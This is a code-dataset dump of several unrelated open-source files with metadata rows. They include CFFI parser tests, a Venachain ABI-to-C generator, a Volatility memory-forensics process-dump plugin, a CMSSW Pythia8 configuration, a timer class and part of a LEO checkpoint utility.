assert struct_names == sorted(struct_names)
enum_names = ["ebar_s", "efoo", "efoo_", "efoo_s", "efoo_s1", "efoo_s12"]
assert enum_names == sorted(enum_names)
identifier_names = ["id", "id0", "id05", "id05b", "tail"]
assert identifier_names == sorted(identifier_names)
global_names = ["FIVE", "NEG", "ZERO"]
assert global_names == sorted(global_names)
ctx = ffi.new("struct _cffi_type_context_s *")
c_struct_names = [ffi.new("char[]", _n.encode('ascii')) for _n in struct_names]
ctx_structs = ffi.new("struct _cffi_struct_union_s[]", len(struct_names))
for _i in range(len(struct_names)):
ctx_structs[_i].name = c_struct_names[_i]
ctx_structs[3].flags = lib._CFFI_F_UNION
ctx.struct_unions = ctx_structs
ctx.num_struct_unions = len(struct_names)
c_enum_names = [ffi.new("char[]", _n.encode('ascii')) for _n in enum_names]
ctx_enums = ffi.new("struct _cffi_enum_s[]", len(enum_names))
for _i in range(len(enum_names)):
ctx_enums[_i].name = c_enum_names[_i]
ctx.enums = ctx_enums
ctx.num_enums = len(enum_names)
c_identifier_names = [ffi.new("char[]", _n.encode('ascii'))
for _n in identifier_names]
ctx_identifiers = ffi.new("struct _cffi_typename_s[]", len(identifier_names))
for _i in range(len(identifier_names)):
ctx_identifiers[_i].name = c_identifier_names[_i]
ctx_identifiers[_i].type_index = 100 + _i
ctx.typenames = ctx_identifiers
ctx.num_typenames = len(identifier_names)
@ffi.callback("int(unsigned long long *)")
def fetch_constant_five(p):
p[0] = 5
return 0
@ffi.callback("int(unsigned long long *)")
def fetch_constant_zero(p):
p[0] = 0
return 1
@ffi.callback("int(unsigned long long *)")
def fetch_constant_neg(p):
p[0] = 123321
return 1
ctx_globals = ffi.new("struct _cffi_global_s[]", len(global_names))
c_glob_names = [ffi.new("char[]", _n.encode('ascii')) for _n in global_names]
for _i, _fn in enumerate([fetch_constant_five,
fetch_constant_neg,
fetch_constant_zero]):
ctx_globals[_i].name = c_glob_names[_i]
ctx_globals[_i].address = _fn
ctx_globals[_i].type_op = ffi.cast("_cffi_opcode_t",
cffi_opcode.OP_CONSTANT_INT if _i != 1
else cffi_opcode.OP_ENUM)
ctx.globals = ctx_globals
ctx.num_globals = len(global_names)
def parse(input):
out = ffi.new("_cffi_opcode_t[]", 100)
info = ffi.new("struct _cffi_parse_info_s *")
info.ctx = ctx
info.output = out
info.output_size = len(out)
for j in range(len(out)):
out[j] = ffi.cast("void *", -424242)
res = lib.parse_c_type(info, input.encode('ascii'))
if res < 0:
raise ParseError(ffi.string(info.error_message).decode('ascii'),
info.error_location)
assert 0 <= res < len(out)
result = []
for j in range(len(out)):
if out[j] == ffi.cast("void *", -424242):
assert res < j
break
i = int(ffi.cast("intptr_t", out[j]))
if j == res:
result.append('->')
result.append(i)
return result
def parsex(input):
result = parse(input)
def str_if_int(x):
if isinstance(x, str):
return x
return '%d,%d' % (x & 255, x >> 8)
return ' '.join(map(str_if_int, result))
def parse_error(input, expected_msg, expected_location):
e = py.test.raises(ParseError, parse, input)
assert e.value.args[0] == expected_msg
assert e.value.args[1] == expected_location
def make_getter(name):
opcode = getattr(lib, '_CFFI_OP_' + name)
def getter(value):
return opcode | (value << 8)
return getter
Prim = make_getter('PRIMITIVE')
Pointer = make_getter('POINTER')
Array = make_getter('ARRAY')
OpenArray = make_getter('OPEN_ARRAY')
NoOp = make_getter('NOOP')
Func = make_getter('FUNCTION')
FuncEnd = make_getter('FUNCTION_END')
Struct = make_getter('STRUCT_UNION')
Enum = make_getter('ENUM')
Typename = make_getter('TYPENAME')
def test_simple():
for simple_type, expected in [
("int", lib._CFFI_PRIM_INT),
("signed int", lib._CFFI_PRIM_INT),
(" long ", lib._CFFI_PRIM_LONG),
("long int", lib._CFFI_PRIM_LONG),
("unsigned short", lib._CFFI_PRIM_USHORT),
("long double", lib._CFFI_PRIM_LONGDOUBLE),
(" float _Complex", lib._CFFI_PRIM_FLOATCOMPLEX),
("double _Complex ", lib._CFFI_PRIM_DOUBLECOMPLEX),
]:
assert parse(simple_type) == ['->', Prim(expected)]
def test_array():
assert parse("int[5]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 5]
assert parse("int[]") == [Prim(lib._CFFI_PRIM_INT), '->', OpenArray(0)]
assert parse("int[5][8]") == [Prim(lib._CFFI_PRIM_INT),
'->', Array(3),
5,
Array(0),
8]
assert parse("int[][8]") == [Prim(lib._CFFI_PRIM_INT),
'->', OpenArray(2),
Array(0),
8]
def test_pointer():
assert parse("int*") == [Prim(lib._CFFI_PRIM_INT), '->', Pointer(0)]
assert parse("int***") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1), '->', Pointer(2)]
def test_grouping():
assert parse("int*[]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), '->', OpenArray(1)]
assert parse("int**[][8]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
'->', OpenArray(4), Array(2), 8]
assert parse("int(*)[]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1), OpenArray(0)]
assert parse("int(*)[][8]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
OpenArray(4), Array(0), 8]
assert parse("int**(**)") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
NoOp(2), Pointer(3), '->', Pointer(4)]
assert parse("int**(**)[]") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0), Pointer(1),
NoOp(6), Pointer(3), '->', Pointer(4),
OpenArray(2)]
def test_simple_function():
assert parse("int()") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), FuncEnd(0), 0]
assert parse("int(int)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(4), FuncEnd(0),
Prim(lib._CFFI_PRIM_INT)]
assert parse("int(long, char)") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), NoOp(6), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_CHAR)]
assert parse("int(int*)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), FuncEnd(0),
Prim(lib._CFFI_PRIM_INT),
Pointer(4)]
assert parse("int*(void)") == [Prim(lib._CFFI_PRIM_INT),
Pointer(0),
'->', Func(1), FuncEnd(0), 0]
assert parse("int(int, ...)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(5), FuncEnd(1), 0,
Prim(lib._CFFI_PRIM_INT)]
def test_internal_function():
assert parse("int(*)()") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
Func(0), FuncEnd(0), 0]
assert parse("int(*())[]") == [Prim(lib._CFFI_PRIM_INT),
NoOp(6), Pointer(1),
'->', Func(2), FuncEnd(0), 0,
OpenArray(0)]
assert parse("int(char(*)(long, short))") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(6), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
NoOp(7), Pointer(5),
Func(4), NoOp(11), NoOp(12), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_SHORT)]
def test_fix_arg_types():
assert parse("int(char(long, short))") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), Pointer(5), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
Func(4), NoOp(9), NoOp(10), FuncEnd(0),
Prim(lib._CFFI_PRIM_LONG),
Prim(lib._CFFI_PRIM_SHORT)]
assert parse("int(char[])") == [
Prim(lib._CFFI_PRIM_INT),
'->', Func(0), Pointer(4), FuncEnd(0),
Prim(lib._CFFI_PRIM_CHAR),
OpenArray(4)]
def test_enum():
for i in range(len(enum_names)):
assert parse("enum %s" % (enum_names[i],)) == ['->', Enum(i)]
assert parse("enum %s*" % (enum_names[i],)) == [Enum(i),
'->', Pointer(0)]
def test_error():
parse_error("short short int", "'short' after another 'short' or 'long'", 6)
parse_error("long long long", "'long long long' is too long", 10)
parse_error("short long", "'long' after 'short'", 6)
parse_error("signed unsigned int", "multiple 'signed' or 'unsigned'", 7)
parse_error("unsigned signed int", "multiple 'signed' or 'unsigned'", 9)
parse_error("long char", "invalid combination of types", 5)
parse_error("short char", "invalid combination of types", 6)
parse_error("signed void", "invalid combination of types", 7)
parse_error("unsigned struct", "invalid combination of types", 9)
#
parse_error("", "identifier expected", 0)
parse_error("]", "identifier expected", 0)
parse_error("*", "identifier expected", 0)
parse_error("int ]**", "unexpected symbol", 4)
parse_error("char char", "unexpected symbol", 5)
parse_error("int(int]", "expected ')'", 7)
parse_error("int(*]", "expected ')'", 5)
parse_error("int(]", "identifier expected", 4)
parse_error("int[?]", "expected a positive integer constant", 4)
parse_error("int[24)", "expected ']'", 6)
parse_error("struct", "struct or union name expected", 6)
parse_error("struct 24", "struct or union name expected", 7)
parse_error("int[5](*)", "unexpected symbol", 6)
parse_error("int a(*)", "identifier expected", 6)
parse_error("int[123456789012345678901234567890]", "number too large", 4)
#
parse_error("_Complex", "identifier expected", 0)
parse_error("int _Complex", "_Complex type combination unsupported", 4)
parse_error("long double _Complex", "_Complex type combination unsupported",
12)
def test_number_too_large():
num_max = sys.maxsize
assert parse("char[%d]" % num_max) == [Prim(lib._CFFI_PRIM_CHAR),
'->', Array(0), num_max]
parse_error("char[%d]" % (num_max + 1), "number too large", 5)
def test_complexity_limit():
parse_error("int" + "[]" * 2500, "internal type complexity limit reached",
202)
def test_struct():
for i in range(len(struct_names)):
if i == 3:
tag = "union"
else:
tag = "struct"
assert parse("%s %s" % (tag, struct_names[i])) == ['->', Struct(i)]
assert parse("%s %s*" % (tag, struct_names[i])) == [Struct(i),
'->', Pointer(0)]
def test_exchanging_struct_union():
parse_error("union %s" % (struct_names[0],),
"wrong kind of tag: struct vs union", 6)
parse_error("struct %s" % (struct_names[3],),
"wrong kind of tag: struct vs union", 7)
def test_identifier():
for i in range(len(identifier_names)):
assert parse("%s" % (identifier_names[i])) == ['->', Typename(i)]
assert parse("%s*" % (identifier_names[i])) == [Typename(i),
'->', Pointer(0)]
def test_cffi_opcode_sync():
import cffi.model
for name in dir(lib):
if name.startswith('_CFFI_'):
assert getattr(cffi_opcode, name[6:]) == getattr(lib, name)
assert sorted(cffi_opcode.PRIMITIVE_TO_INDEX.keys()) == (
sorted(cffi.model.PrimitiveType.ALL_PRIMITIVE_TYPES.keys()))
def test_array_length_from_constant():
parse_error("int[UNKNOWN]", "expected a positive integer constant", 4)
assert parse("int[FIVE]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 5]
assert parse("int[ZERO]") == [Prim(lib._CFFI_PRIM_INT), '->', Array(0), 0]
parse_error("int[NEG]", "expected a positive integer constant", 4)
def test_various_constant_exprs():
def array(n):
return [Prim(lib._CFFI_PRIM_CHAR), '->', Array(0), n]
assert parse("char[21]") == array(21)
assert parse("char[0x10]") == array(16)
assert parse("char[0X21]") == array(33)
assert parse("char[0Xb]") == array(11)
assert parse("char[0x1C]") == array(0x1C)
assert parse("char[0xc6]") == array(0xC6)
assert parse("char[010]") == array(8)
assert parse("char[021]") == array(17)
parse_error("char[08]", "invalid number", 5)
parse_error("char[1C]", "invalid number", 5)
parse_error("char[0C]", "invalid number", 5)
# not supported (really obscure):
# "char[+5]"
# "char['A']"
def test_stdcall_cdecl():
assert parse("int __stdcall(int)") == [Prim(lib._CFFI_PRIM_INT),
'->', Func(0), NoOp(4), FuncEnd(2),
Prim(lib._CFFI_PRIM_INT)]
assert parse("int __stdcall func(int)") == parse("int __stdcall(int)")
assert parse("int (__stdcall *)()") == [Prim(lib._CFFI_PRIM_INT),
NoOp(3), '->', Pointer(1),
Func(0), FuncEnd(2), 0]
assert parse("int (__stdcall *p)()") == parse("int (__stdcall*)()")
parse_error("__stdcall int", "identifier expected", 0)
parse_error("__cdecl int", "identifier expected", 0)
parse_error("int __stdcall", "expected '('", 13)
parse_error("int __cdecl", "expected '('", 11)
| 41.355615
| 80
| 0.556669
|
490b1821a60873afc28790d035763d183d76ac2f
| 10,655
|
py
|
Python
|
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | 1
|
2022-03-03T01:43:58.000Z
|
2022-03-03T01:43:58.000Z
|
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | null | null | null |
tools/venachainWASM2c.py
|
xunzhu0507/BoAT-X-Framework
|
d84d1e0c244b4ff20c7f5b74f939f61a9811283d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (C) 2018-2021 aitos.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This python script generates Venachain's C language interface function from contract ABI (WASM).
# Not all contract ABI can be converted to C interface because C is lack of object-oriented programming
# capability. If the tool fails to generate the interface, you may have to organize the contract call
# manually.
# The generated C API is named "<ContractName><ContractApiName>", with a transaction pointer argument
# followed by contract arguments.
#
# For state-less contract call, the generated C API retuns a HEX string representing what is received
# from the blockchain network. If the call is successful, the string is the return value of the contract
# function. The return value string has to be parsed manually as per the contract prototype. If the call
# fails, it returns NULL.
#
# For value transfer or state-ful contract call, i.e. a transaction, the generated C API returns a HEX
# string representing the transaction hash. If the transaction fails, it returns NULL.
import sys
import json
import os.path
generated_declaration_block_str = '''/******************************************************************************
This file is generated from contract ABI. DO NOT modify it by hand.
******************************************************************************/
'''
generated_include_block_str = '''
// Generated C function interface from smart contract ABI
#include "boatconfig.h"
#include "boatiotsdk.h"
'''
# Map from type used in smart contract to type in C
type_mapping = {
'string' :'BCHAR*',
'uint8' :'BUINT8',
'uint16' :'BUINT16',
'uint32' :'BUINT32',
'uint64' :'BUINT64',
# 'uint128' :'BUINT128',
'int8' :'BSINT8',
'int16' :'BSINT16',
'int32' :'BSINT32',
'int64' :'BSINT64',
# 'int128' :'BSINT128',
'void' :'void'
}
class CFunctionGen():
def __init__(self, abi_file_name, output_path):
self.abi_object = None
self.c_file_content = ''
self.h_file_content = ''
with open(abi_file_name) as file_handle:
self.abi_object = json.load(file_handle)
self.abi_file_name = os.path.basename(abi_file_name)
self.output_path = output_path
def generate_c_funcs(self):
if self.abi_object != None:
self.c_file_content += generated_declaration_block_str
self.c_file_content += generated_include_block_str
self.h_file_content += generated_declaration_block_str
self.h_file_content += generated_include_block_str
for abi_item in self.abi_object:
if abi_item['type'] == 'function':
self.generate_func_prototype(abi_item)
self.generate_func_body(abi_item)
def generate_func_prototype(self, abi_item):
# Extract type of return value
if len(abi_item['outputs']) == 0:
retval_str = 'BCHAR *' #'void'
else:
# For stateful transaction, returns Tx Hash;
# For state-less function call, returns a string representing the return value
retval_str = 'BCHAR *'
# Extract function name (Prefix with ABI file name because multiple contracts may have same function names)
func_name_str = self.abi_file_name.replace('.json','')
func_name_str = func_name_str.replace('.','_') + '_' + abi_item['name']
# Extract function arguments
inputs = abi_item['inputs']
inputs_len = len(inputs)
input_str = '('
input_str += 'BoatVenachainTx *tx_ptr'
if inputs_len != 0:
input_str += ', '
i = 0
while i < inputs_len:
input = inputs[i]
try:
input_str += type_mapping[input['type']] + ' ' + input['name']
except:
print(abi_item['name'] + '(): WASM C++ type (' + input['type'] + ') is incompatible with C interface auto generator.')
print('You may have to manually construct the transaction.')
quit(-1)
if i != inputs_len -1:
input_str += ', '
i = i + 1
input_str += ')'
# Generate function prototype
self.c_file_content += retval_str + func_name_str + input_str + '\n'
self.h_file_content += retval_str + func_name_str + input_str + ';\n'
def generate_func_body(self, abi_item):
func_body_str = '{\n'
# Generate local variables
if abi_item['constant'] == 'true':
func_body_str += ' BCHAR *call_result_str = NULL;\n'
else:
func_body_str += ' static BCHAR tx_hash_str[67] = \"\";\n'
func_body_str += ' BoatFieldVariable data_field;\n'
func_body_str += ' RlpEncodedStreamObject *rlp_stream_ptr;\n'
func_body_str += ' RlpObject rlp_object_list;\n'
# func_body_str += ' RlpObject rlp_object_txtype;\n'
# func_body_str += ' BUINT64 txtype;\n'
func_body_str += ' RlpObject rlp_object_string_func_name;\n'
# Local variables extracted from function arguments
inputs = abi_item['inputs']
for input in inputs:
func_body_str += ' RlpObject rlp_object_string_' + input['name'] + ';\n'
func_body_str += ' boat_try_declare;\n\n'
# Set Nonce
if abi_item['constant'] != 'true':
func_body_str += ' boat_try(BoatVenachainTxSetNonce(tx_ptr, BOAT_VENACHAIN_NONCE_AUTO));\n\n'
# Initialize List
func_body_str += ' boat_try(RlpInitListObject(&rlp_object_list));\n\n'
# Append Transaction Type
# func_body_str += ' txtype = tx_ptr->rawtx_fields.txtype;\n'
# func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_txtype, UtilityChangeEndian(&txtype, sizeof(txtype)), sizeof(txtype)));\n'
# func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_txtype));\n\n'
# Append Contract Function Name
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_func_name' + ', (BUINT8*)\"' + abi_item['name'] + '\", strlen(\"' + abi_item['name'] + '\")));\n'
func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_string_func_name));\n\n'
# Append arguments
for input in inputs:
if input['type'] == 'string':
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_' + input['name'] + ', (BUINT8*)' + input['name'] + ', strlen(' + input['name'] + ')));\n'
else:
try:
param_size_str = 'sizeof(' + type_mapping[input['type']] + ')'
except:
print(abi_item['name'] + '(): WASM C++ type (' + input['type'] + ') is incompatible with C interface auto generator.')
print('You may have to manually construct the transaction.')
quit(-1)
func_body_str += ' boat_try(' + 'RlpInitStringObject(&rlp_object_string_' + input['name'] + ', UtilityChangeEndian(&' + input['name'] + ', ' + param_size_str + ')' + ', ' + param_size_str + '));\n'
func_body_str += ' boat_try(' + '0 > RlpEncoderAppendObjectToList(&rlp_object_list, &rlp_object_string_' + input['name'] + '));\n\n'
# Encode RLP list for function parameters
func_body_str += ' boat_try(RlpEncode(&rlp_object_list, NULL));\n\n'
func_body_str += ' rlp_stream_ptr = RlpGetEncodedStream(&rlp_object_list);\n\n'
if abi_item['constant'] == 'true':
# for state-less funciton call
func_body_str += ' call_result_str = BoatVenachainCallContractFunc(tx_ptr, rlp_stream_ptr->stream_ptr, rlp_stream_ptr->stream_len);\n\n'
else:
# for stateful transaction
func_body_str += ' data_field.field_ptr = rlp_stream_ptr->stream_ptr;\n'
func_body_str += ' data_field.field_len = rlp_stream_ptr->stream_len;\n'
func_body_str += ' boat_try(BoatVenachainTxSetData(tx_ptr, &data_field));\n\n'
func_body_str += ' boat_try(BoatVenachainTxSend(tx_ptr));\n\n'
func_body_str += ' UtilityBinToHex(tx_hash_str, tx_ptr->tx_hash.field, tx_ptr->tx_hash.field_len, BIN2HEX_LEFTTRIM_UNFMTDATA, BIN2HEX_PREFIX_0x_YES, BOAT_FALSE);\n\n'
# Cleanup Label
func_body_str += '''
boat_catch(cleanup)
{
RlpRecursiveDeleteObject(&rlp_object_list);
return(NULL);
}
'''
func_body_str += '\n RlpRecursiveDeleteObject(&rlp_object_list);\n'
if abi_item['constant'] == 'true':
func_body_str += ' return(call_result_str);\n'
else:
func_body_str += ' return(tx_hash_str);\n'
func_body_str += '\n}\n\n'
self.c_file_content += func_body_str
def save_c_file(self):
if self.abi_object != None:
c_file_name = self.output_path + '/' + self.abi_file_name.replace('.json','.c')
with open(c_file_name, 'w') as c_file_handle:
c_file_handle.write(self.c_file_content)
h_file_name = self.output_path + '/' + self.abi_file_name.replace('.json','.h')
with open(h_file_name, 'w') as h_file_handle:
h_file_handle.write(self.h_file_content)
def main():
argc = len(sys.argv)
if argc <= 1 or argc >= 4:
print('Usage: ' + sys.argv[0] + ' <ABI File> ' + '[<Output path>]')
else:
if argc == 2:
output_path = './'
else:
output_path = sys.argv[2]
c_func_object = CFunctionGen(sys.argv[1], output_path)
c_func_object.generate_c_funcs()
c_func_object.save_c_file()
if __name__ == '__main__':
main()
| 39.029304
| 216
| 0.601877
|
22871b4d4f9d9306552c79445eb5455779d3b924
| 3,039
|
py
|
Python
|
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | 2
|
2018-07-16T13:30:40.000Z
|
2018-07-17T12:02:05.000Z
|
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | null | null | null |
volatility/volatility/plugins/mac/procdump.py
|
williamclot/MemoryVisualizer
|
2ff9f30f07519d6578bc36c12f8d08acc9cb4383
|
[
"MIT"
] | null | null | null |
# Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import os
import volatility.obj as obj
import volatility.debug as debug
import volatility.plugins.mac.pstasks as mac_tasks
import volatility.plugins.mac.common as mac_common
from volatility.renderers import TreeGrid
from volatility.renderers.basic import Address
class mac_procdump(mac_tasks.mac_tasks):
""" Dumps the executable of a process """
def __init__(self, config, *args, **kwargs):
mac_tasks.mac_tasks.__init__(self, config, *args, **kwargs)
self._config.add_option('DUMP-DIR', short_option = 'D', default = None, help = 'Output directory', action = 'store', type = 'str')
def unified_output(self, data):
if (not self._config.DUMP_DIR or not os.path.isdir(self._config.DUMP_DIR)):
debug.error("Please specify an existing output dir (--dump-dir)")
return TreeGrid([("Task", str),
("Pid", int),
("Address", Address),
("Path", str),
], self.generator(data))
def generator(self, data):
for proc in data:
exe_address = proc.text_start()
if exe_address:
file_path = mac_common.write_macho_file(self._config.DUMP_DIR, proc, exe_address)
yield (0, [
str(proc.p_comm),
int(proc.p_pid),
Address(exe_address),
str(file_path),
])
def render_text(self, outfd, data):
if (not self._config.DUMP_DIR or not os.path.isdir(self._config.DUMP_DIR)):
debug.error("Please specify an existing output dir (--dump-dir)")
self.table_header(outfd, [("Task", "25"),
("Pid", "6"),
("Address", "[addrpad]"),
("Path", "")])
for proc in data:
exe_address = proc.text_start()
if exe_address:
file_path = mac_common.write_macho_file(self._config.DUMP_DIR, proc, exe_address)
self.table_row(outfd, proc.p_comm, proc.p_pid, exe_address, file_path)
| 37.9875
| 138
| 0.60974
|
f75b98564bb5b3dbd67314573125a83ca579baf8
| 1,257
|
py
|
Python
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
Configuration/Generator/python/QCD_Pt_1800_2400_14TeV_TuneCP5_cfi.py
|
Purva-Chaudhari/cmssw
|
32e5cbfe54c4d809d60022586cf200b7c3020bcf
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
generator = cms.EDFilter("Pythia8ConcurrentGeneratorFilter",
pythiaHepMCVerbosity = cms.untracked.bool(False),
maxEventsToPrint = cms.untracked.int32(0),
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.), ## fake value
crossSection = cms.untracked.double(1.), ## fake value
comEnergy = cms.double(14000.0), # center of mass energy in GeV
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CP5SettingsBlock,
processParameters = cms.vstring(
'HardQCD:all = on',
'PhaseSpace:pTHatMin = 1800.',
'PhaseSpace:pTHatMax = 2400.'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CP5Settings',
'processParameters',
)
)
)
| 46.555556
| 89
| 0.546539
|
f25425f8463d4bd369f30c28a48bcd44b881fee0
| 1,270
|
py
|
Python
|
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
src/pyprobe/iteration.py
|
dittert/pyprobe
|
1b0d0e403645ed204332c70c8a89e094f860023a
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import time
__author__ = 'Dirk Dittert'
class IllegalOrderException(Exception):
"""
Signals that some of the methods were called in an unexpected order.
"""
pass
class Iteration(object):
def __init__(self, period):
"""
:type period: int
"""
if period <= 0:
raise ValueError("Iteration periond must be >0 but was " + str(period))
self._period = float(period)
self._start_time = None
self._end_time = None
def start_timer(self):
self._start_time = time.time()
def stop_timer(self):
if self._start_time is None:
raise IllegalOrderException("start() must be called before stop()")
self._end_time = time.time()
def _time_to_next_iteration(self):
""" :rtype: float """
if self._start_time is None:
raise IllegalOrderException("start() must be called first.")
if self._end_time is None:
raise IllegalOrderException("end() must be called first.")
duration = self._end_time - self._start_time
return max(self._period - duration, 0.0)
def wait_until_next_iteration(self):
duration = self._time_to_next_iteration()
time.sleep(duration)
| 27.608696
| 83
| 0.624409
|
d585da7f158e1991f18eef7d2e0ecc34b5b5b3e2
| 4,473
|
py
|
Python
|
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
utils.py
|
fzohra/despurold
|
bf526d608c38e29c025309f1e4925598f161286e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Short utility functions for LEO."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
from six.moves import range
import tensorflow as tf
import config
import data
def unpack_data(problem_instance):
"""Map data.ProblemInstance to a list of Tensors, to process with map_fn."""
if isinstance(problem_instance, data.ProblemInstance):
return list(problem_instance)
return problem_instance
def copy_checkpoint(checkpoint_path, global_step, accuracy):
"""Copies the checkpoint to a separate directory."""
tmp_checkpoint_path = os.path.join(checkpoint_path, "tmp_best_checkpoint")
best_checkpoint_path = os.path.join(checkpoint_path, "best_checkpoint")
if _is_previous_accuracy_better(best_checkpoint_path, accuracy):
tf.logging.info("Not copying the checkpoint: there is a better one from "
"before a preemption.")
return
checkpoint_regex = os.path.join(checkpoint_path,
"model.ckpt-{}.*".format(global_step))
checkpoint_files = tf.gfile.Glob(checkpoint_regex)
graph_file = os.path.join(checkpoint_path, "graph.pbtxt")
checkpoint_files.append(graph_file)
_save_files_in_tmp_directory(tmp_checkpoint_path, checkpoint_files, accuracy)
new_checkpoint_index_file = os.path.join(tmp_checkpoint_path, "checkpoint")
with tf.gfile.Open(new_checkpoint_index_file, "w") as f:
f.write("model_checkpoint_path: \"{}/model.ckpt-{}\"\n".format(
best_checkpoint_path, global_step))
# We first copy the better checkpoint to a temporary directory, and only
# when it's created move it to avoid inconsistent state when job is preempted
# when copying the checkpoint.
if tf.gfile.Exists(best_checkpoint_path):
tf.gfile.DeleteRecursively(best_checkpoint_path)
tf.gfile.Rename(tmp_checkpoint_path, best_checkpoint_path)
tf.logging.info("Copied new best checkpoint with accuracy %.5f", accuracy)
def _save_files_in_tmp_directory(tmp_checkpoint_path, checkpoint_files,
accuracy):
"""Saves the checkpoint files and accuracy in a temporary directory."""
if tf.gfile.Exists(tmp_checkpoint_path):
tf.logging.info("The temporary directory exists, because job was preempted "
"before it managed to move it. We're removing it.")
tf.gfile.DeleteRecursively(tmp_checkpoint_path)
tf.gfile.MkDir(tmp_checkpoint_path)
def dump_in_best_checkpoint_path(obj, filename):
full_path = os.path.join(tmp_checkpoint_path, filename)
with tf.gfile.Open(full_path, "wb") as f:
pickle.dump(obj, f)
for file_ in checkpoint_files:
just_filename = file_.split("/")[-1]
tf.gfile.Copy(
file_,
os.path.join(tmp_checkpoint_path, just_filename),
